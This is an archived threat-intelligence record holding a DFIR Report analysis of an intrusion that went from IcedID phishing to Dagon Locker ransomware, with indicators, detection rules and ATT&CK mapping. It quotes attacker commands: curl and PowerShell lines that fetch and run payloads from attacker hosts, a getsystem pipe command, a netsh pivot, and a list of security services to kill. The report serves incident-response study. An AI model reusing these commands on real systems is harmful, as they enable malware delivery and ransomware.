{
	"id": "e7c2eda3-6e35-4859-9fa4-171f3badcff3",
	"created_at": "2026-04-06T00:16:26.076867Z",
	"updated_at": "2026-04-10T13:11:50.326327Z",
	"deleted_at": null,
	"sha1_hash": "efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1",
	"title": "From IcedID to Dagon Locker Ransomware in 29 Days - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12846991,
	"plain_text": "From IcedID to Dagon Locker Ransomware in 29 Days - The DFIR Report\r\nBy editor\r\nPublished: 2024-04-29 · Archived: 2026-04-05 13:07:08 UTC\r\nKey Takeaways\r\nIn August 2023, we observed an intrusion that started with a phishing campaign using PrometheusTDS to distribute IcedID.\r\nIcedID dropped and executed a Cobalt Strike beacon, which was then used throughout the intrusion.\r\nThe threat actor leveraged a bespoke PowerShell tool known as AWScollector to facilitate a range of malicious activities including discovery, lateral movement, data exfiltration, and ransomware deployment.\r\nGroup Policy was used to distribute Cobalt Strike beacons at login to a specific privileged user group.\r\nThe threat actor utilized a suite of tools to support their activities, deploying Rclone, Netscan, Nbtscan, AnyDesk, Seatbelt, Sharefinder, and AdFind.\r\nThis case had a TTR (time to ransomware) of 29 days.\r\nMore information about IcedID and Dagon Locker can be found in the following reports: SentinelOne, The DFIR Report, and Group-IB.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published post-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a 
demo!\r\nTable of Contents:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 1 of 41\n\nCase Summary\r\nServices\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThis intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. This phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware. Victims were directed to a fraudulent website mimicking an Azure download portal, where they were prompted to download a malicious JavaScript file. Upon executing this file, a multi-step attack was triggered. Initially, a batch file was generated and executed on the user’s system. This batch file used the curl command to download an IcedID DLL file. Finally, this DLL file was executed, completing the malware installation process.\r\nOnce the DLL file was executed, the IcedID malware established persistence by creating a scheduled task on the infected system. This ensured that the malware would continue to operate even after the system was restarted. Following this, the malware established a command and control (C2) connection with the IcedID servers. Through this connection, it executed a series of discovery commands using standard Windows utilities to gather information about the infected system. After about 30 hours of inactivity, the IcedID malware downloaded and executed a Cobalt Strike beacon.\r\nThe Cobalt Strike beacon was staged on the temporary file-sharing website file.io and was downloaded to the infected host using PowerShell. 
Once executed, the threat actor leveraged commonly used system utilities such as net, whoami, nltest, and ping to conduct discovery operations from the Cobalt Strike beacon. Shortly after these initial discovery operations, we observed access to the Local Security Authority Subsystem Service (LSASS) process, indicating attempts to access credentials. There was also evidence of the GetSystem command being used for privilege escalation, allowing the attacker to obtain higher-level system privileges.\r\nWithin just five minutes of executing the Cobalt Strike beacon, the threat actor initiated lateral movement within the network. They transferred a Cobalt Strike beacon to a domain controller using the Server Message Block (SMB) protocol. This beacon was then executed via remote services.\r\nThe threat actor continued their discovery activities on both the initial beachhead and the domain controller, specifically targeting file shares. To accomplish this, they utilized a combination of net commands, AdFind, and Sharefinder to identify and access these network shares. After locating the desired network shares, they deployed Rclone, though its usage was brief. Next, the threat actor shifted to using a custom PowerShell tool named AWSCollector. This tool’s initial deployment involved executing a series of system discovery commands on remote hosts through its systeminfo module.\r\nApproximately an hour and a half after initiating data exfiltration with Rclone, the threat actor transitioned to their custom AWSCollector script to continue the data transfer to AWS S3 bucket storage. Over the ensuing hours, they continued discovery operations and even deployed a Speedtest tool, likely to assess the network speed and determine the feasibility and duration of their exfiltration efforts. 
As the data exfiltration progressed, they expanded their foothold in the environment by deploying Cobalt Strike beacons to additional hosts. These were copied to hosts using SMB and the Windows copy utility, followed by the execution of the beacon by remote WMIC commands.\r\nAs the situation progressed into the third day, the threat actor remained engaged and active, continuing their data exfiltration activities. They also deployed discovery tools such as Seatbelt and SoftPerfect Netscan to further explore the network. On the fourth day, the focus shifted to the virtualization infrastructure. The threat actor executed various commands to gather information about the virtualization components, which involved the zipping and suspected exfiltration of targeted documents pertinent to virtualization. Additionally, on network shares, the threat actor located and reviewed documents containing passwords for the organization.\r\nEntering the fifth day, the threat actor continued discovery efforts using many of the same tools previously observed. During this period, they also began dumping Windows event logs and executing various WMIC discovery commands to gain further insight into the environment. The activities on the sixth and seventh days mirrored those of the previous days. On the eighth day, the threat actor deployed AnyDesk on a domain controller using a PowerShell script. This script not only installed AnyDesk but also created a new user account and added it to the local administrators group. On this day we also observed the threat actor deploy a new Cobalt Strike beacon.\r\nUsing the AnyDesk access, the threat actor logged into the domain controller and accessed various system administrator utilities, including Sites and Services, Administrative Center, Domains and Trusts, Users and Computers, and Group Policy. 
The focus of their activity seemed to be Group Policy, where they attempted to create a Logon script for the environment.\r\nThree days after their previous actions, the threat actor returned to modify the Group Policy settings they had initially focused on. Following these changes, they expanded their operational scope by installing AnyDesk and Cobalt Strike beacons on additional hosts. Over the next several days, the threat actor continued to return, utilizing the graphical user interfaces (GUI) of Windows administrative tools to review and likely analyze data.\r\nOn the 28th day of activity, the threat actor resumed operations by attempting to configure a domain controller to proxy RDP access across another network segment using the netsh utility. However, this configuration failed to achieve their intended result and was promptly removed. The threat actor also engaged in network reconnaissance by requesting Kerberos Service Principal Names (SPNs) using the setspn command-line tool.\r\nOn the 29th day, they started running discovery checks using net commands. About five hours later, they prepared for their final operations by staging a Dagon Locker ransomware file on a domain controller. Utilizing their custom AWSCollector script, the ransomware was deployed via SMB to remote hosts. The script also generated a batch script to disable services, delete shadow copies, and execute the ransomware, leading to domain-wide ransomware. 
This entire process resulted in a Time to Ransomware (TTR) of 684 hours, over 29 days.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by r3nzsec, angelo_violetti \u0026 UC1\r\nInitial Access\r\nIn August 2023 we observed an IcedID e-mail phishing campaign, utilizing PrometheusTDS URLs directly in email.\r\n@ffforward reported the distribution on Twitter:\r\nFor a full breakdown on the TDS see this report by Group-IB.\r\nOnce the user clicked the link, they would be presented with an Azure-looking page containing a captcha, and if they passed all the filtering requirements of the TDS they would be presented with a download for a JavaScript file, Document_Scan_468.js in this intrusion.\r\nExecution\r\nIcedID\r\nWhen the user executed the downloaded JavaScript file, Document_Scan_468.js, the following happened:\r\nA bat file was created using a curl command to download the IcedID payload from moashraya[.]com.\r\nC:\\Windows\\System32\\cmd.exe\" /c echo curl https://moashraya[.]com/out/t.php --output \"%temp%\\magni.waut.a\" --ssl no-revoke --insecure --location \u003e \"%temp%\\magni.w.bat\r\nExecution of the batch script.\r\ncmd.exe /c \"%temp%\\magnu.w.bat\"\r\nAfter downloading, the file magni.waut.a is renamed to magni.w.\r\ncmd.exe /c ren \"%temp%\\magni.waut.a\" \"magni.w\"\r\nUsing rundll32.exe, it executes the function scab with the arguments \\k arabika752 from the downloaded and renamed file magni.w.\r\nrundll32 \"%temp%\\magni.w\", scab \\k arabika752\r\nShortly after, we see rundll32.exe accessing and injecting into svchost.exe.\r\n
Using memory captured from the system and processing it with MemProcFS, we can see YARA scanning confirmation of the IcedID injection into process 4492.\r\nThis process then started communicating out to the following C2 domains:\r\newacootili[.]com (151.236.9[.]176)\r\nultrascihictur[.]com (159.223.95[.]82)\r\nmagiraptoy[.]com (194.58.68[.]187)\r\nIt then deleted the file %temp%\\festival-.dat. This was most likely an update to the IcedID configuration which gets loaded.\r\nA summary of the discovery commands and other activity can be seen in the Discovery section.\r\nDecoding the obfuscated JavaScript\r\nDocument_Scan_468.js employed a simple obfuscation technique. The technique consists of splitting the commands to be run into chunks of three and concatenating them together. The same technique was used to obfuscate the JS functions as well.\r\nCobalt Strike DLL HTTPS Beacon\r\nThe first Cobalt Strike beacon was downloaded, and subsequently executed, by the threat actor from file.io through the following PowerShell commands.\r\npowershell.exe(New-Object System.Net.WebClient).DownloadFile(\"https://file[.]io/OUXPza4b4uxZ\", \"C:\\P\r\n%WINDIR%\\system32\\rundll32.exe\" update.dll,HTVIyKUVoTzv\r\nCobalt Strike PowerShell HTTPS Beacon\r\nVia the Cobalt Strike command and control server, the threat actor generated a PowerShell script which injected a stageless beacon into memory.\r\nIn the first part of the script, there are two defined functions, func_get_proc_address and func_get_delegate_type, 
which are used to dynamically load and execute unmanaged code. Subsequently, a long BASE64 encoded string is defined which corresponds to the Cobalt Strike shellcode.\r\nThe BASE64 string is then XOR decoded with a decimal key equal to 35. In order to inject the decoded shellcode, the script retrieves the function pointers for the Windows API functions GetModuleHandleA and GetProcAddress, which are needed to obtain a pointer to VirtualAlloc. The call to VirtualAlloc creates a new memory region with AllocationType MEM_COMMIT | MEM_RESERVE (0x3000) and MemoryProtection ExecuteReadWrite (0x40). These values passed to VirtualAlloc are classic signs of process injection. Subsequently, the shellcode is copied into the newly created region of memory and then executed through the Invoke() function.\r\nThe BASE64 string can be easily decoded through CyberChef to get the Cobalt Strike shellcode. It is possible to recognize the classic MZ header (magic_mz_x86 and magic_mz_x64): MZARUH.\r\nBy executing the PowerShell script and monitoring the API calls performed by the process through API Monitor, it is possible to identify the calls to InternetConnectA() with the Cobalt Strike C2s specified as parameters.\r\nExisting YARA rules detect Cobalt Strike beacons by hunting for the previously mentioned header, like the following one; however, defenders need to be aware that those types of strings can be modified in beacons through malleable profiles.\r\nPersistence\r\nIcedID\r\nDuring the execution of the initial IcedID malware, a scheduled task was created to maintain persistence.\r\nThe task was set to run when the 
user logged in using the ‘LogonTrigger’. While audit logging was not enabled to observe the task creation via a 4698 event, we were able to use Sysmon registry and file creation events for the task XML to correlate the creation with the initial IcedID malware.\r\nRegistry item related to task creation:\r\nFile write for task XML:\r\nCobalt Strike\r\nThe threat actor created several scheduled tasks on different servers to achieve persistent execution of Cobalt Strike. As you can see below, the scheduled task files were created by an injected svchost process.\r\nThis is an example of one of the scheduled tasks created that, when executed, downloads and executes a Cobalt Strike beacon from 51.89.133[.]3.\r\nFurthermore, on a domain controller, the threat actor created a bat file under the local group policy directory.\r\nC:\\Windows\\System32\\GroupPolicy\\User\\Scripts\\Logon\\test.bat\r\nThe bat file contains the same PowerShell command as the scheduled task. 
These were then set up to execute at login by a GPO targeting users in a specific domain group.\r\nThese same scheduled tasks could be located in the GPO policies under SYSVOL on the domain controller; below is an example of one pulled from a memory capture.\r\nAnyDesk\r\nDuring the intrusion, the threat actor used a PowerShell script named anydesk.ps1 to:\r\nDownload AnyDesk into the ProgramData folder.\r\nInstall AnyDesk in silent mode and set the password to access the software remotely.\r\nCreate a user named oldadministrator, add it to the local administrator group, and hide it from the Windows home/login screen.\r\nInstalling AnyDesk in this way sets up the program with a service to start automatically, providing the threat actor with an additional means of persistence in the network.\r\nThe AnyDesk ad.trace logs track incoming connections into the system. Those logs can be found under the folder C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\AnyDesk.\r\nThe ad_svc.trace log files record the external IP addresses that logged into the system. Those logs can be found under the folder C:\\ProgramData\\Anydesk.\r\nAnyDesk Client-ID:\r\nClient-ID: 150937834\r\nThe following two IP addresses were identified that could be related to VPN services based on IPQualityScore:\r\n82.102.18.244 – NordVPN\r\n194.33.40.113 – Surfshark VPN\r\nNew User Creation\r\nThe anydesk.ps1 script included the creation of a new user account, which was then added to the local administrators group and then hidden from the logon screen. 
This latter technique is performed by setting the value of the following registry key related to the specific user to “0”:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\r\nPrivilege Escalation\r\nTo obtain SYSTEM privileges, the threat actor executed the getsystem Cobalt Strike functionality multiple times. We saw the threat actor use variations of this, which indicates likely getsystem activity:\r\nC:\\Windows\\system32\\cmd.exe /c echo 00e4f7418cd \u003e \\\\.\\pipe\\9090e9\r\nThis technique was thoroughly described here:\r\nSEO Poisoning to Domain Control: The Gootloader Saga Continues\r\nWhen the threat actor created the new user account, they also added that new account to a privileged Active Directory group.\r\nDefense Evasion\r\nProcess Injection\r\nAs mentioned in the Execution section, we see IcedID injecting itself into svchost.exe.\r\nWe also observed Cobalt Strike injecting into gpupdate.exe. Later they injected themselves into svchost.exe. 
This\r\nwas done as a result of using named pipe impersonation to get SYSTEM rights on the client.\r\nDumping PID 4860 from memory and scanning with YARA rules from the LOKI signature base we can find\r\nevidence of the Cobalt Strike injection.\r\nVolatility dump command:\r\nvol -f [REDACTED].dmp windows.memmap.Memmap --dump --pid 4860\r\nScan results:\r\nWe can get further corroboration with 1768.py:\r\nWe can also use the memory file processed with MemprocFS for similar YARA scan hits:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 20 of 41\n\nDisable or Modify System Firewall\r\nWe observed the threat actor attempting to access a restricted host by pivoting through another host.\r\nThis was attempted by using the built-in netsh portproxy command to port forward 3390 on the local host, to 3389\r\n(RDP) on the remote host.\r\nStops known services on the host\r\nGenerates a list of services to stop based on a built-in list and checking each system using Get-Service\r\nServices of interest:\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 21 of 41\n\neventlog\r\nwecsvc\r\nSntpService\r\nSophos Agent\r\nSophos Endpoint Defense Service\r\nSophos Message Router\r\nSophos System Protection Service\r\nArcticWolfAgentMgr\r\nendpoint\r\ncybereason\r\ncylance\r\nDefWatch\r\nccEvtMgr\r\nccSetMgr\r\nSavRoam\r\nRTVscan\r\nYooBackup\r\nYooIT\r\nzhudongfangyu\r\nsophos\r\nstc_raw_agent\r\nVSNAPVSS\r\nVeeamTransportSvc\r\nVeeamDeploymentService\r\nVeeamNFSSvc\r\nveeam\r\nPDVFSService\r\nBackupExecVSSProvider\r\nBackupExecAgentAccelerator\r\nBackupExecAgentBrowser\r\nBackupExecDiveciMediaService\r\nBackupExecJobEngine\r\nBackupExecManagementService\r\nBackupExecRPCService\r\nAcrSch2Svc\r\nAcronisAgent\r\nCASAD2DWebSvc\r\nCAARCUpdateSvc\r\nSBPIMSvc\r\nOssecSvc\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 22 of 41\n\nDeletes 
shadow copies Sets system to boot into recovery mode on next restart\r\nMultiple methods to distribute and execute the ransomware If dll , use rundll32.exe If exe , use\r\nregsvr32.exe Using different switches depending if there is additional options, or not.\r\nThe module also supports testing using the -dryrun switch by not deploying the ransomware binary.\r\nThe threat actor also referenced multiple examples of running different ransomware variants, possibly indicating\r\noverlap between groups, reuse of tooling, or perhaps an affiliate that has used all of the referenced ransomware\r\nfamilies.\r\nEgregor\r\nREvil\r\nXing\r\nQuantum\r\njustright\r\nMount Locker\r\nPieper\r\nuhmc/ummc\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 23 of 41\n\nottawa\r\nConti\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 24 of 41\n\nPivoting on indicators\r\nIn the script there is a function to send messages to their Telegram Bot. 
This function is used multiple times\r\nthroughout the script to send updates during execution.\r\nThe domain resolves to 51.89.133[.]3 which has also been seen used as a Cobalt Strike C2 and to serve beacons\r\nduring other phases of the intrusion.\r\nChecking the certificate associated with the IP reveals an interesting association.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 25 of 41\n\n108.62.123[.]147 is also identified in the Command and Control section related to Cobalt Strike.\r\nImpact\r\n29 days after initial access, the threat actor started to deploy the Dagon Locker ransomware in the environment.\r\nThe threat actor distributed Dagon Locker ransomware on multiple systems across the environment through the\r\ncustom PowerShell script, AWScollector, and the locker module described earlier.\r\nThe following PowerShell command was run from a domain controller.\r\ninvokemodule -module locker -locker \u003cREDACTED\u003e.dll -lockerpath programdata\\microsoft -lockertype dll\r\nTo prevent data recovery and stop multiple services, two different files called sysfunc.cmd were dropped into the\r\nsystems.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 26 of 41\n\nSubsequently the execution of the locker PowerShell module, the ransomware, was deployed to different systems.\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 27 of 41\n\nAll systems were left with the below message:\r\nDagon Locker left on the test workstation also a log file related to its execution called sysfunc.dll.log .\r\nVer 5.1 x64\r\n========== SYS INFO ==========\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 28 of 41\n\nCORE COUNT: [REDACTED]\r\nTOTAL MEM: [REDACTED]\r\nWIN VER: [REDACTED]\r\nWIN ARCH: x64\r\nUSER NAME: [REDACTED]\r\nPC NAME: [REDACTED]\r\nIN DOMAIN: YES\r\nIS ADMIN: 
YES\r\nIN GROUPS:\r\nMandatory [REDACTED]\\Domain Users\r\nMandatory \\Everyone\r\nMandatory BUILTIN\\Administrators\r\nMandatory BUILTIN\\Remote Desktop Users\r\nMandatory BUILTIN\\Users\r\nMandatory NT AUTHORITY\\NETWORK\r\nMandatory NT AUTHORITY\\Authenticated Users\r\nMandatory NT AUTHORITY\\This Organization\r\n[...]\r\nIntegrity Mandatory Label\\High Mandatory Level\r\nCMDLINE: rundll32.exe C:\\programdata\\microsoft\\sysfunc.dll,run /target=C:\\programdata\\microso\r\n[INFO] locker.init \u003e locker ext .dagoned\r\n================================\r\n KILL SERVICE\r\n================================\r\n================================\r\n KILL PROCESS\r\n================================\r\n========== TARGET LOCK ==========\r\n[INFO] locker.work.start.target \u003e type=drive target=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.work.thread.local \u003e path=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.queue.worker \u003e empty group=FAST\r\n[INFO] locker.queue.worker \u003e empty group=SLOW\r\n[ERROR] locker.dir \u003e enum error=3 name=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.work.thread.local \u003e enum finish path=C:\\programdata\\microsoft\\WPD\\\r\n[INFO] locker.thread.proxy \u003e finish path=C:\\programdata\\microsoft\\WPD\\\r\n==[ STATS ]=======================\r\nTotal crypted: 0.000 GB\r\nCrypt Avg: 0.000 MB/s\r\nFiles: 0.000 files/s\r\nTime: 1 sec\r\n==[ DIRS ]========================\r\nTotal: 0\r\nSkipped: 0\r\nError: 1\r\n==[ FILES ]=======================\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 29 of 41\n\nTotal: 0\r\nLocked: 0\r\n==[ FILES SKIPPED ]===============\r\nBlack: 0\r\nLocked: 0\r\nManual: 0\r\nProg: 0\r\nSize: 0\r\n==[ FILE ERROR ]==================\r\nOpen: 0\r\nRead: 0\r\nWrite: 0\r\nPos: 0\r\nRename: 0\r\n[OK] locker \u003e finished\r\nTimeline\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 30 of 
41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 31 of 41\n\nDiamond Model\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 32 of 41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 33 of 41\n\nIndicators\r\nAtomic\r\nIcedID\r\n143.110.245[.]38:443\r\n159.89.124[.]188:443\r\n188.114.97[.]7:443\r\n151.236.9[.]176:443\r\n159.223.95[.]82:443\r\n194.58.68[.]187:443\r\n87.251.67[.]168:443\r\n151.236.9[.]166:443\r\nrpgmagglader[.]com\r\nultrascihictur[.]com\r\noopscokir[.]com\r\nrestohalto[.]site\r\newacootili[.]com\r\nmagiraptoy[.]com\r\nfraktomaam[.]com\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 34 of 41\n\npatricammote[.]com\r\nmoashraya[.]com\r\nCobalt Strike\r\n23.159.160[.]88\r\n45.15.161[.]97\r\n51.89.133[.]3\r\nwinupdate.us[.]to\r\nComputed\r\nDocument_Scan_468.js\r\n0d8a41ec847391807acbd55cbd69338b\r\n5066e67f22bc342971b8958113696e6c838f6c58\r\nf6e5dbff14ef272ce07743887a16decbee2607f512ff2a9045415c8e0c05dbb4\r\nlicense.dat\r\nbff696bb76ea1db900c694a9b57a954b\r\nca10c09416a16416e510406a323bb97b0b0703ef\r\n332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953\r\nRiadnc1.dll\r\na144aa7a0b98de3974c547e3a09f4fb2\r\n34c9702c66faadb4ce90980315b666be8ce35a13\r\n9da84133ed36960523e3c332189eca71ca42d847e2e79b78d182da8da4546830\r\nmagni.w\r\n7e9ef45d19332c22f1f3a316035dcb1b\r\n4e0222fd381d878650c9ebeb1bcbbfdfc34cabc5\r\n839cf7905dc3337bebe7f8ba127961e6cd40c52ec3a1e09084c9c1ccd202418e\r\nmagni.w.bat\r\nb3495023a3a664850e1e5e174c4b1b08\r\n38cd9f715584463b4fdecfbac421d24077e90243\r\n65edf9bc2c15ef125ff58ac597125b040c487640860d84eea93b9ef6b5bb8ca6\r\nupdate.dll\r\n628685be0f42072d2b5150d4809e63fc\r\n437fe3b6fdc837b9ee47d74eb1956def2350ed7e\r\na0191a300263167506b9b5d99575c4049a778d1a8ded71dcb8072e87f5f0bbcf\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-d
agon-locker-ransomware-in-29-days/\r\nPage 35 of 41\n\nDetections\r\nNetwork\r\nET MALWARE Win32/IcedID Requesting Encoded Binary M4\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 60%)\r\nET ATTACK_RESPONSE Microsoft Powershell Banner Outbound\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement\r\nET POLICY WinRM wsman Access - Possible Lateral Movement\r\nET INFO DYNAMIC_DNS HTTP Request to a *.us .to Domain\r\nET INFO Windows Powershell User-Agent Usage\r\nET POLICY Powershell Activity Over SMB - Likely Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File\r\nET HUNTING Possible Powershell .ps1 Script Use Over SMB\r\nET DNS Query for .to TLD\r\nET INFO DYNAMIC_DNS Query to a *.us .to Domain\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET POLICY WMIC WMI Request Over SMB - Likely Lateral Movement\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\nb26feb0b-8891-4e66-b2e7-ec91dc045d58 : AnyDesk Network\r\n8a0d153f-b4e4-4ea7-9335-892dfbe17221 : NetScan Share Enumeration Write Access Check\r\n59e3a079-4245-4203-9d5c-f11290c5ba24 : Hiding local user accounts\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 36 of 41\n\ne7732014-c4b9-4653-92b2-aa7cfe154bf7 : Data Exfiltration via AWS CLI\r\n50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery\r\ndfbdd206-6cf2-4db9-93a6-0b7e14d5f02f : CHCP CodePage Locale Lookup\r\nDFIR Private Rules:\r\na526e0c3-d53b-4d61-82a1-76d3d1358a30 : Silent Installation of AnyDesk 
RMM\r\nb526e0c3-d53b-4d61-82a1-76d3d1358a31 : AnyDesk RMM Password Setup via Command Line\r\nde60a371-48c3-4e72-baae-ac56c8fb7349 : Data exfiltration to amazon AWS S3 buckets\r\nSigma Repo:\r\n530a6faa-ff3d-4022-b315-50828e77eef5 : Anydesk Remote Access Software Service Installation\r\n114e7f1c-f137-48c8-8f54-3088c24ce4b9 : Remote Access Tool - AnyDesk Silent Installation\r\nb52e84a3-029e-4529-b09b-71d19dd27e94 : Remote Access Tool - AnyDesk Execution\r\nb1377339-fda6-477a-b455-ac0923f9ec2c : Remote Access Tool - AnyDesk Piped Password Via CLI\r\ne37db05d-d1f9-49c8-b464-cee1a4b11638 : PUA - Rclone Execution\r\nc8557060-9221-4448-8794-96320e6f3e74 : Windows PowerShell User Agent\r\n903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\ncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\n0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo\r\n1eeed653-dbc8-4187-ad0c-eeebb20e6599 : Potential SPN Enumeration Via Setspn.EXE\r\nYara\r\nHunting/Analysis Rules:\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/23869/23869.yar\r\nhttps://github.com/malpedia/signator-rules/blob/main/rules/win.cobalt_strike_auto.yar\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 37 of 41\n\ninformational_AdFind_AD_Recon_and_Admin_Tool\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/5426/5426.yar\r\nAdfind\r\nhttps://github.com/bartblaze/Yara-rules/blob/master/rules/hacktools/Adfind.yar\r\nnbtscan_utility_softcell\r\nhttps://github.com/advanced-threat-research/Yara-Rules/blob/master/APT/APT_Operation_SoftCell.yar\r\nWindows_Trojan_CobaltStrike_7f8da98a\r\nhttps://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.ya\r\nMITRE 
ATT\u0026CK\r\nAccess Token Manipulation - T1134\r\nArchive via Utility - T1560.001\r\nData Encrypted for Impact - T1486\r\nDisable or Modify System Firewall - T1562.004\r\nDomain Account - T1087.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nExfiltration to Cloud Storage - T1567.002\r\nFile and Directory Discovery - T1083\r\nInhibit System Recovery - T1490\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nNetwork Share Discovery - T1135\r\nProcess Injection - T1055\r\nRemote Access Software - T1219\r\nScheduled Task - T1053.005\r\nSystem Information Discovery - T1082\r\nSystem Language Discovery - T1614.001\r\nSystem Time Discovery - T1124\r\nWeb Protocols - T1071.001\r\nSMB/Windows Admin Shares - T1021.002\r\nWindows Command Shell - T1059.003\r\nWindows Management Instrumentation - T1047\r\nPowershell - T1059.001\r\nJavascript - T1059.007\r\nRundll32 - T1218.011\r\nCommand Obfuscation - T1027.010\r\nDomain Account - T1136.002\r\nCredentials In Files - T1552.001\r\nDisable or Modify Tools - T1562.001\r\nSystem Owner/User Discovery - T1033\r\nData from Network Shared Drive - T1039\r\nEncrypted Channel - T1573\r\nIngress Tool Transfer - T1105\r\nAutomated Exfiltration - T1020\r\nService Stop - T1489\r\nInternal case # TB23869 PR28513\r\nSource: https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nTo obtain SYSTEM privileges, the threat actor executed the getsystem Cobalt Strike functionality multiple times.\r\nWe saw the threat actor use variations of this which indicates likely getsystem activity:\r\nC:\\Windows\\system32\\cmd.exe /c echo 00e4f7418cd \u003e \\\\.\\pipe\\9090e9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/"
	],
	"report_names": [
		"from-icedid-to-dagon-locker-ransomware-in-29-days"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434586,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1.pdf",
